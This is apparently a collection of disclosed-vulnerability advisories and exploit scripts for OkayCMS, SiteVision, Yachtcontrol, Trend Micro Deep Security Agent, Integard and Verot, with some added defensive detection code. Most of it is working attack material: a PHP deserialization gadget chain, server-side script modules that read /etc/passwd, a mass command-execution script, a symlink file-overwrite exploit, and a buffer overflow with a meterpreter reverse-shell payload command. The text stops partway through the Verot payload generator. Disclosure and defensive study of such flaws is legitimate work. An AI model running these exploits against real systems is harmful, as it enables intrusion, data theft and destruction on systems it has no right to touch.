OkayCMS versions 2.3.4 and below suffer from a remote code execution vulnerability.

MD5 | ac48925812fe6df9cf4011ec5409f36d

# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content management system for an online store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious PHP object via a crafted cookie. This can happen in two places: in "view/ProductsView.php" via the cookie "price_filter", and in "api/Comparison.php" via the cookie "comparison". Both cookies pass untrusted values straight to unserialize(). The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```
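As an added detection example (not part of the advisory or of OkayCMS), the following Python scans a raw Cookie header for the two cookies named above and reports any PHP object tokens (`O:<len>:"Class":`) embedded in their serialized values, which a legitimate price filter or comparison list would never contain. The serialized gadget used as sample input is reconstructed from the proof-of-concept classes in the next section with a placeholder path; only the cookie names come from the page.

```python
import re
from urllib.parse import quote, unquote_plus

# Cookies that OkayCMS feeds straight into unserialize() (from the advisory)
UNSAFE_COOKIES = ("price_filter", "comparison")

# Start of a PHP serialized object: O:<name length>:"<ClassName>":<property count>:{
OBJECT_TOKEN = re.compile(r'O:(\d+):"([^"]*)":\d+:\{')


def parse_cookie_header(header):
    """Split a raw Cookie header into {name: raw_value} (values left URL-encoded)."""
    cookies = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, value = part.strip().split("=", 1)
        cookies[name] = value
    return cookies


def serialized_classes(value):
    """Return the class name of every well-formed object token in a PHP serialized string."""
    found = []
    for match in OBJECT_TOKEN.finditer(value):
        length, name = int(match.group(1)), match.group(2)
        if len(name.encode()) == length:   # PHP stores the byte length of the class name
            found.append(name)
    return found


def inspect_cookie_header(header):
    """Return [(cookie_name, [classes])] for unsafe cookies whose value carries objects."""
    findings = []
    for name, raw in parse_cookie_header(header).items():
        if name not in UNSAFE_COOKIES:
            continue
        classes = serialized_classes(unquote_plus(raw))
        if classes:
            findings.append((name, classes))
    return findings


# Constructed sample: the Smarty gadget chain from the proof of concept as PHP would
# serialize it (lock_id set to a placeholder path), URL-encoded the way the PoC sends it
GADGET = (
    'O:24:"Smarty_Internal_Template":2:{s:6:"smarty";O:6:"Smarty":1:{s:13:"cache_locking";b:1;}'
    's:6:"cached";O:22:"Smarty_Template_Cached":3:{s:7:"handler";'
    'O:34:"Smarty_Internal_CacheResource_File":0:{}s:9:"is_locked";b:1;s:7:"lock_id";s:10:"/tmp/x.txt";}}'
)
MALICIOUS_HEADER = "PHPSESSID=abc123; price_filter=" + quote(GADGET, safe="")
# Constructed benign value: a plain serialized array carries no object tokens
BENIGN_HEADER = "price_filter=" + quote('a:2:{s:3:"min";i:10;s:3:"max";i:100;}', safe="")

if __name__ == "__main__":
    print(inspect_cookie_header(MALICIOUS_HEADER))
    print(inspect_cookie_header(BENIGN_HEADER))
```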


## Proof of Concept
The following proof of concept uses a gadget chain built from Smarty component classes to delete an arbitrary file on the web host:

```
<?php

if ($argc != 3) {
    print "usage: $argv[0] <url> <file>\n";
    exit(1);
}

$url  = $argv[1];
$file = $argv[2];

// Minimal copies of the Smarty classes involved in the gadget chain; only the
// properties and the single method that matter for the chain are declared.
class Smarty_Internal_CacheResource_File {

    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
        $cached->is_locked = false;
        @unlink($cached->lock_id);   // the file named in lock_id is deleted
    }
}

class Smarty_Template_Cached {
    public $handler = null;
    public $is_locked = true;
    public $lock_id = "";

    public function __construct() {
        $this->lock_id = $GLOBALS['file'];   // target path from the command line
        $this->handler = new Smarty_Internal_CacheResource_File;
    }
}

class Smarty {
    public $cache_locking = true;
}

class Smarty_Internal_Template {
    public $smarty = null;
    public $cached = null;

    public function __construct() {
        $this->smarty = new Smarty;
        $this->cached = new Smarty_Template_Cached;
    }

    // Entry point of the chain: runs when the unserialized object is destroyed
    public function __destruct() {
        if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
            $this->cached->handler->releaseLock($this->smarty, $this->cached);
        }
    }
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

// Local sanity check of the chain (this copy's destructor runs when the script exits)
$un = unserialize($serialized);

$headers = [
    'Accept-Language: en-US,en;q=0.5',
    "Referer: $url/en/catalog/myagkie-igrushki",
    'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_HTTPHEADER => $headers,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
    CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if (curl_error($curl)) {
    print curl_error($curl);
}
curl_close($curl);

print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions
All versions of the "Lite" branch up to and including 2.3.4. Pro versions prior to 3.0.2 might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References
* https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)




SiteVision suffers from an issue where attackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account. All versions of SiteVision 4 until 4.5.6 and all versions of SiteVision 5 until 5.1.1 are vulnerable.

MD5 | d41da44b8c24a9290a4500079e64ac00

# SiteVision Remote Code Execution

CVE-2019-12733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12733
https://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/

## Summary
Attackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account.

## Vendor Description
SiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision.

## Affected Versions
All versions of SiteVision 4 until 4.5.6.
All versions of SiteVision 5 until 5.1.1.
Earlier major versions are assumed to be vulnerable.

## Technical Details
The SiteVision application does not sufficiently validate whether or not the current user is permitted to add or edit modules of the "script" type. This means that a low-privilege user such as an Editor ("Redaktör") can inject a new script module, or edit an existing one, and leverage it to execute arbitrary code.

The access control flaw that allows users to inject non-authorised modules is described separately in CVE-2019-12734.

While the scripts are written in JavaScript, the environment allows the developer to reach and import Java APIs.

Reproduced on SiteVision 4 and 5; the following steps apply to SiteVision 5:

1. Install SiteVision and either create or import a new site.
2. Set up and create an Editor ("Redaktör") user.
3. Log on as the new low-privilege user.
4. Create a new page and note how only basic modules are available.
5. Insert a text module.
6. Re-send the HTTP request generated in step #5, but change the value of portletType from "text" to "script". The following is the resulting request for our demo environment:

```
POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1
Host: fast.furious
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://fast.furious/edit/4.549514a216b1c6180f41c3
Content-Type: application/json; charset=utf-8
X-CSRF-Token: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: [...]

{"portletType":"script","relativeElement":"12.549514a216b1c6180f41d0"}
```

7. Issue the modified request to the application.
8. Reload the current page and note how it now contains a script module.
9. Edit the script module to contain the following JavaScript code:

```
const app = (() => {
    'use strict';

    importPackage(java.io);
    importPackage(java.lang);

    const init = () => {
        var result = [];

        var p = Runtime.getRuntime().exec("whoami");
        var stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
        var s;
        while ((s = stdInput.readLine()) != null) {
            result.push(s);
        }

        return result;
    };

    return { init: init };
})();

const context = app.init();
```

9b. The following PoC can be used instead to read files such as /etc/passwd or /etc/shadow:

```
const app = (() => {
    'use strict';

    importPackage(java.io);
    importPackage(java.lang);

    const init = () => {
        var result = [];
        var file = new File('/etc/passwd');
        var br = new BufferedReader(new FileReader(file));

        var st;
        while ((st = br.readLine()) != null) {
            result.push(st);
        }

        return result;
    };

    return { init: init };
})();

const context = app.init();
```

10. Enter the following Velocity code:

```
Script output:

As List:

#foreach( $c in $context )
  • $c
#end
```

SiteVision suffers from an issue where attackers may inject non-authorized modules when editing pages using a lower-privileged account, which can lead to cross site scripting and remote code execution. All versions of SiteVision 4 until 4.5.6 and all versions of SiteVision 5 until 5.1.1 are vulnerable.

MD5 | e1039e826a6e95e90bc983b83ebc51fe

# SiteVision Insufficient Module Access Control

CVE-2019-12734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12734
https://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/


## Summary
Attackers may inject non-authorised modules when editing pages using a low-privilege account, leading to impacts ranging from Cross-Site Scripting to Remote Code Execution.


## Vendor Description
SiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision.


## Affected Versions
All versions of SiteVision 4 until 4.5.6.
All versions of SiteVision 5 until 5.1.1.
Earlier major versions are assumed to be vulnerable.


## Technical Details
This vulnerability allows remote code execution as described in CVE-2019-12733.

Modules are basic building blocks in SiteVision pages and templates; they can feature display content such as headings and paragraphs, social functions and commenting, raw HTML, or server-side scripts.

The SiteVision application does not sufficiently assert whether or not the current user is authorised to add a specific module type to the current page, allowing low-privilege attackers to add hostile content. This can trivially be reproduced by adding a paragraph text module and changing "text" to "html" (or any other type) in the outgoing HTTP request. The application does not check whether or not the user is authorised to add the requested module; it relies on the fact that the user interface does not expose a button for it.

Reproduced on SiteVision 4 and 5; the following steps apply to SiteVision 5:

1. Install SiteVision and either create or import a new site.
2. Set up and create an Editor ("Redaktör") user.
3. Log on as the new low-privilege user.
4. Create a new page and note how only basic modules are available.
5. Insert a text module.
6. Re-send the HTTP request generated in step #5, but change the value of portletType from "text" to "html". The following is the resulting request for our demo environment:

```
POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1
Host: fast.furious
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://fast.furious/edit/4.549514a216b1c6180f41c3
Content-Type: application/json; charset=utf-8
X-CSRF-Token: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: [...]

{"portletType":"html","relativeElement":"12.549514a216b1c6180f41d0"}
```

7. Edit the HTML module and inject any JavaScript payload such as `alert(1)`.
8. Under "Other" check "Show in edit mode".
9. Press "OK".
10. Note the alert pop-up, indicating that the injected JavaScript was executed.
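As an added illustration (not SiteVision code), the following Python shows the server-side check the advisory says is missing: the handler for the portlet endpoint parses the JSON body of the captured request and decides from the user's role, not from what the editing UI exposes, whether the requested portletType may be created. The role-to-module table and the sample request helper are constructed for this example; only the endpoint, the body format and the "Editor"/"text"/"html"/"script" names come from the page.

```python
import json

# Module types each role may add (constructed policy; only "Editor" and the
# "text"/"html"/"script" types are taken from the advisory)
ROLE_MODULES = {
    "editor": {"text", "image", "heading"},
    "developer": {"text", "image", "heading", "html", "script"},
}


def parse_edit_api_request(raw):
    """Split a raw HTTP request into (method, path, parsed JSON body)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path, _ = head.split("\r\n", 1)[0].split(" ", 2)
    return method, path, json.loads(body) if body else {}


def authorize_portlet(role, body):
    """Deny-by-default decision on the requested portletType; returns (allowed, reason)."""
    portlet_type = body.get("portletType")
    if not isinstance(portlet_type, str):
        return False, "portletType missing or not a string"
    if portlet_type not in ROLE_MODULES.get(role, set()):
        return False, "role %r may not create %r modules" % (role, portlet_type)
    return True, "ok"


def handle_create_portlet(role, raw_request):
    """Server-side handler for POST .../portlet; returns (http_status, response_body)."""
    method, path, body = parse_edit_api_request(raw_request)
    if method != "POST" or not path.endswith("/portlet"):
        return 404, {"error": "unknown endpoint"}
    allowed, reason = authorize_portlet(role, body)
    if not allowed:
        # Whether the UI showed a button is irrelevant: the request body is what is checked
        return 403, {"error": reason}
    return 201, {"created": body["portletType"], "relativeElement": body.get("relativeElement")}


def sample_request(portlet_type):
    """Replay of the captured request with the portletType swapped (constructed helper)."""
    body = json.dumps({"portletType": portlet_type,
                       "relativeElement": "12.549514a216b1c6180f41d0"})
    return (
        "POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1\r\n"
        "Host: fast.furious\r\n"
        "Content-Type: application/json; charset=utf-8\r\n"
        "Content-Length: %d\r\n\r\n" % len(body)
    ) + body


if __name__ == "__main__":
    for role, kind in (("editor", "text"), ("editor", "script"), ("developer", "script")):
        print(role, kind, handle_create_portlet(role, sample_request(kind)))
```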


## Vulnerability Disclosure Timeline
2019-06-03 - Disclosed to vendor
2019-06-04 - Vendor confirms vulnerability
2019-09-26 - Vendor issues patches
2019-12-04 - Public disclosure

Oscar Hjelm
Cybercom Sweden



A malicious application can take advantage of a vulnerability in Symantec Endpoint Protection to leak privileged information and/or execute code with higher privileges, thus taking full control over the affected host. Symantec Endpoint Protection versions 14.x below 14.2 (RU1) and 12.x below 12.1 (RU6 MP10) are affected. Symantec Endpoint Protection Small Business Edition versions 12.x below 12.1 (RU6 MP10c) are affected.

MD5 | adaa581b77f7d19cd5f1123812a01cb9

Advisory
A malicious application can take advantage of a vulnerability in Symantec Endpoint Protection to leak privileged information and/or execute code with higher privileges, thus taking full control over the affected host.

Products Affected
Symantec Endpoint Protection v14.x < v14.2 (RU1)
Symantec Endpoint Protection v12.x < 12.1 (RU6 MP10)
Symantec Endpoint Protection Small Business Edition v12.x < 12.1 (RU6 MP10c)

https://support.symantec.com/us/en/article.SYMSA1487.html
https://labs.nettitude.com/blog/cve-2019-12750-symantec-endpoint-protection-local-privilege-escalation-part-1/

Timeline
Date of discovery: April 2019
Vendor informed: 18 April 2019
Vendor Acknowledged: 19 April 2019
Vendor Requested Extra Time: 19 April 2019
Advisory [1]: 31 July 2019
Nettitude blog [2]: 5 December 2019

References

1. https://support.symantec.com/us/en/article.SYMSA1487.html

2. https://labs.nettitude.com/blog/cve-2019-12750-symantec-endpoint-protection-local-privilege-escalation-part-1/

Kyriakos Economou
Senior Vulnerability Researcher




Yachtcontrol versions dated 2019-10-06 suffer from an unauthenticated remote code execution vulnerability.

MD5 | ca74a5272a744f07e91607ab0200e00a

# Exploit Title: Yachtcontrol Webapplication - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2019-12-06
# Exploit Author: Hodorsec
# Vendor Homepage: http://www.yachtcontrol.nl/en/
# Software Link: http://download.yachtcontrol.nl/klant/Software/ & http://download.yachtcontrol.nl/klant/Firmware/
# Versions: Yachtcontrol webapplication through versions dated on 2019-10-06
# Tested on: Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
# CVE: CVE-2019-17270
#
# Description Product:
# Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication,
# it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components.
# Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht.
# Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices.
#
# Description Vulnerability:
# It is possible to execute operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}"
# page and parameter, where {COMMAND} is executed and its output is returned to the client.
#
# Affected Components:
# Yachtcontrol webservers using the custom PHP webapplication, versions until 2019-10-06.

```
#!/usr/bin/env python3
import sys
import os
import requests

# Check arguments
if len(sys.argv) != 5:
    print("Error: enter at least one IP/FQDN as argument. Exiting...")
    print("\nUsage: " + sys.argv[0] + " {IP/FQDN} {PORT} {PROTO} {COMMAND}\n")
    exit(0)

# Parameters
host = sys.argv[1]
port = sys.argv[2]
proto = sys.argv[3]
command = sys.argv[4]
timeout = 10
isFile = False

# Check for file or single IP/FQDN
if os.path.isfile(host):
    isFile = True
    with open(host) as f:
        targets = f.readlines()

# Vulnerable page
page = "/pages/systemcall.php?command="

# HTTP or HTTPS
if proto == "http":
    proto = "http://"
elif proto == "https":
    proto = "https://"
else:
    print("\nInvalid method given: enter http or https\n")
    exit(0)


def do_request(target):
    """Send the command to one host and print the response without the echoed command."""
    try:
        response = requests.get(proto + target + ":" + port + page + command, verify=False, timeout=timeout)
        print(response.text.replace('executing command: ' + command, ''))
    except requests.exceptions.Timeout:
        print("Timed out.")
    except requests.exceptions.RequestException:
        print("Host not found.")


# Do the request
if isFile:
    for host in targets:
        target = host.strip()
        print(target)
        do_request(target)
else:
    do_request(host)
```

# Disclosure Timeline using CERT/CC disclosure policy:
# - 06-10-19: Requested CVE
# - 06-10-19: Contacted vendor for initial contact, used several publicly known mailaddresses
# - 12-10-19: Sent reminder due to no response
# - 06-11-19: Sent second reminder due to no response
# - 08-11-19: Received response requesting information, sent information
# - 11-11-19: Correspondence concerning vulnerability
# - 25-11-19: Sent reminder of publishing PoC to vendor, received response
# - 05-12-19: Sent final reminder of publishing PoC to vendor
# - 06-12-19: Public Disclosure
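As an added defender-side example (not part of the exploit above), this Python scans web-server access-log lines for hits on the /pages/systemcall.php endpoint described in the header and recovers the command that was passed, undoing repeated URL-encoding so double-encoded requests are not missed. The log lines are constructed and the combined access-log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint that runs the "command" parameter without authentication (from the advisory)
VULNERABLE_PATH = "/pages/systemcall.php"

# Combined access-log format (assumed); the request target is the part that matters here
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def extract_command(target):
    """Return the decoded OS command if the request targets systemcall.php, else None."""
    parts = urlsplit(target)
    if unquote(parts.path) != VULNERABLE_PATH:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("command")
    if not values:
        return None
    cmd = values[0]                      # parse_qs already removed one encoding layer
    # Undo extra layers (%2520 -> %20 -> space) used to slip past naive pattern matches
    while "%" in cmd and unquote(cmd) != cmd:
        cmd = unquote(cmd)
    return cmd


def scan_access_log(lines):
    """Return (client_ip, timestamp, command) for every request that hit the endpoint."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        cmd = extract_command(match.group("target"))
        if cmd is not None:
            hits.append((match.group("ip"), match.group("ts"), cmd))
    return hits


# Constructed log lines: a benign page view, two hits on the endpoint (the second one
# double-encoded), and a request to a different page that carries the same parameter name
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Dec/2019:10:01:12 +0100] "GET /index.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [06/Dec/2019:10:02:40 +0100] "GET /pages/systemcall.php?command=id HTTP/1.1" 200 88',
    '10.0.0.9 - - [06/Dec/2019:10:02:58 +0100] "GET /pages/systemcall.php?command=uname%2520-a HTTP/1.1" 200 140',
    '10.0.0.7 - - [06/Dec/2019:10:03:02 +0100] "GET /pages/status.php?command=id HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, ts, cmd in scan_access_log(SAMPLE_LOG):
        print("%s %s command=%r" % (ts, ip, cmd))
```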


Trend Micro Deep Security Agent 11 suffers from an arbitrary file overwrite vulnerability.

MD5 | 679cae457bfcd23467151f2a07ff694f

# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
# Exploit Author : Peter Lapp
# Exploit Date: 2019-12-05
# Vendor Homepage : https://www.trendmicro.com/en_us/business.html
# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
# CVE: 2019-15627

# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)

# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with arbitrary data hosted elsewhere (with limitations)
# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS,
# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired.

# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file.
# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage,
# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces,
# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that
# are ripe for the writing that can then point to a malicious binary.

# Usage:
# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part.
# 2. Open a browser (preferably IE) and start the script
# 3. Browse to your malicious page (if just deleting the target file, browse to any page with JavaScript).
# 4. Keep refreshing the page until the script reports that the target file has been overwritten.
#
# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit.


```
import time
import os
import subprocess
import sys
import webbrowser
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

# Paths used by the agent and by the script (backslashes doubled for Python)
AMSP_TEMP = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp'
AMSP_TEMP_ORIG = AMSP_TEMP + '-orig'
AGENT_DIR = 'C:\\Program Files\\Trend Micro\\Deep Security Agent'
STAGING_DIR = 'C:\\test'


class Stage1_Handler(FileSystemEventHandler):
    """Watch the scanner's temp directory until a temp file name is reused."""
    def __init__(self):
        self.filenames = []

    def on_created(self, event):
        filename = os.path.basename(event.src_path)
        if filename in self.filenames:
            print('Starting symlink creation.')
            watcher1.stop()
            symlinkery(self.filenames)
        else:
            self.filenames.append(filename)
            print('File %s created.' % filename)


class Stage2_Handler(FileSystemEventHandler):
    """Watch the agent directory for the target file being touched, then clean up."""
    def on_any_event(self, event):
        if os.path.basename(event.src_path) == 'dsa_control.cmd':
            print("Target file overwritten/deleted. Cleaning up.")
            subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
            subprocess.Popen("taskkill /F /T /IM BaitAndSwitch.exe", shell=True)
            os.system('rmdir /S /Q "%s"' % AMSP_TEMP)
            os.system('rmdir /S /Q "%s"' % STAGING_DIR)
            os.rename(AMSP_TEMP_ORIG, AMSP_TEMP)
            watcher2.stop()
            sys.exit(0)


class Watcher(object):
    def __init__(self, event_handler, path_to_watch):
        self.event_handler = event_handler
        self.path_to_watch = path_to_watch
        self.observer = Observer()

    def run(self):
        self.observer.schedule(self.event_handler(), self.path_to_watch)
        self.observer.start()
        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            self.observer.stop()

        self.observer.join()

    def stop(self):
        self.observer.stop()


def symlinkery(filenames):
    """Point each predicted temp file name at the bait file, then replace the temp directory with a junction."""
    print("Enter symlinkery")
    for filename in filenames:
        print("Creating symlink for %s" % filename)
        cmdname = 'start cmd /c CreateSymlink.exe "%s\\virus\\%s" "%s\\test\\symtarget"' % (STAGING_DIR, filename, STAGING_DIR)
        subprocess.Popen(cmdname, shell=True)
    os.rename(AMSP_TEMP, AMSP_TEMP_ORIG)
    os.system('mklink /J "%s" %s' % (AMSP_TEMP, STAGING_DIR))
    watcher2.run()
    print("Watcher 2 started")


try:
    os.mkdir(STAGING_DIR)
except OSError:
    pass

path1 = AMSP_TEMP + '\\virus'
path2 = AGENT_DIR + '\\'
watcher1 = Watcher(Stage1_Handler, path1)
watcher2 = Watcher(Stage2_Handler, path2)
switcheroo = ('start cmd /c BaitAndSwitch.exe %s\\test\\symtarget "%s\\dsa_control.cmd" '
              '"C:\\windows\\temp\\deleteme.txt" d' % (STAGING_DIR, AGENT_DIR))
subprocess.Popen(switcheroo, shell=True)
watcher1.run()
```


Integard Pro NoJs version 2.2.0.9026 suffers from a remote buffer overflow vulnerability.

MD5 | a2fb460aecb7da8b7638b7121d90da78

Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
Date: 2019-09-22
Exploit Author: purpl3f0xsecur1ty
Vendor Homepage: https://www.tucows.com/
Software Link: http://www.tucows.com/preview/519612/Integard-Home
Version: Pro 2.2.0.9026 / Home 2.0.0.9021
Tested on: Windows XP / Win7 / Win10
CVE: CVE-2019-16702

```
#!/usr/bin/env python3
########################################################
#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
# The vulnerability: Integard fails to sanitize input  #
# to the "NoJs" parameter in an HTTP POST request,     #
# resulting in a stack buffer overflow that overwrites #
# the instruction pointer, leading to remote code      #
# execution.                                           #
########################################################

import socket
from struct import pack

HOST = "10.0.0.130"
PORT = 18881

####################################################
# Integard's functionality interferes with reverse #
# and bind shells. Only Meterpreter seems to work. #
####################################################

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
# -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread
meterpreter = b"\x90" * 50
# The msfvenom-generated shellcode bytes that followed here are omitted;
# append the output of the command above to `meterpreter`.


def build_request(crash):
    """Wrap the oversized NoJs value in the login POST the server expects."""
    headers = (
        "POST /LoginAdmin HTTP/1.1\r\n"
        "Host: 10.0.0.130:18881\r\n"
        "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: en-US,en;q=0.5\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://10.0.0.130:18881/\r\n"
        "Connection: close\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 78\r\n\r\n"
    ).encode()
    body = b"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + b"&LoginButtonName=Login\r\n"
    return headers + body


def send(buffer):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.send(buffer)
    s.close()
    print("[*] Done")


def main():
    print("~*Integard RCE Exploit for XP/7/10*~")
    print("Choose target: (Enter number only)")
    print("1) - Windows XP")
    print("2) - Windows 7/10")
    target = input().strip()

    if target == "1":
        print("[*] Sending Windows XP payload using meterpreter/reverse_tcp")
        # JMP ESP at 0x3E087557 in iertutil.dll
        crash = b"A" * 512
        crash += pack("<L", 0x3E087557)
        crash += meterpreter
        crash += b"C" * (1500 - len(crash))
        send(build_request(crash))

    if target == "2":
        print("[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp")

        # ASLR IS ON!!! MUST USE NON-ASLR MODULE!
        # POP POP RET in integard.exe (ASLR disabled)
        nSEH = b"\xEB\xD0\x90\x90"  # Jump 48 bytes backwards
        SEH = pack("<L", 0x004042B0)

        jumpCall = b"\xEB\x09"  # Jump 11 bytes forward to hit the CALL in bigBackJump
        bigBackJump = b"\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"

        crash = b"\x90" * (2776 - len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
        crash += meterpreter
        crash += b"\x90" * 50
        crash += jumpCall
        crash += bigBackJump
        crash += nSEH
        crash += SEH
        send(build_request(crash))


main()
```


Verot version 2.0.3 suffers from a remote code execution vulnerability.

MD5 | 6739d5e2efeb9ae98d493066bae7aa08

# Exploit Title: Verot 2.0.3 - Remote Code Execution
# Date: 2019-12-05
# Exploit Author: Jinny Ramsmark
# Vendor Homepage: https://www.verot.net/php_class_upload.htm
# Software Link: https://github.com/verot/class.upload.php
# Version: <=2.0.3
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
# CVE : CVE-2019-19576

```
<?php
#Title: jpeg payload generator for file upload RCE
#Author: Jinny Ramsmark
#Github: https://github.com/jra89/CVE-2019-19576
#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
#Usage: php inject.php
#Output: image.jpg.phar is the file to be used for upload and exploitation

#This script assumes no special transforming is done on the image for this specific CVE.
#It can be modified however for different sizes and so on (x,y vars).

ini_set('display_errors', 1);
error_reporting(E_PARSE);
#requires php, php-gd

$orig = 'image.jpg';
$code = '';          // payload to embed; left empty in the original script
$quality = "85";
$base_url = "http://lorempixel.com";

echo "-=Imagejpeg injector 1.7=-\n";

do
{
    $x = 100;
    $y = 100;
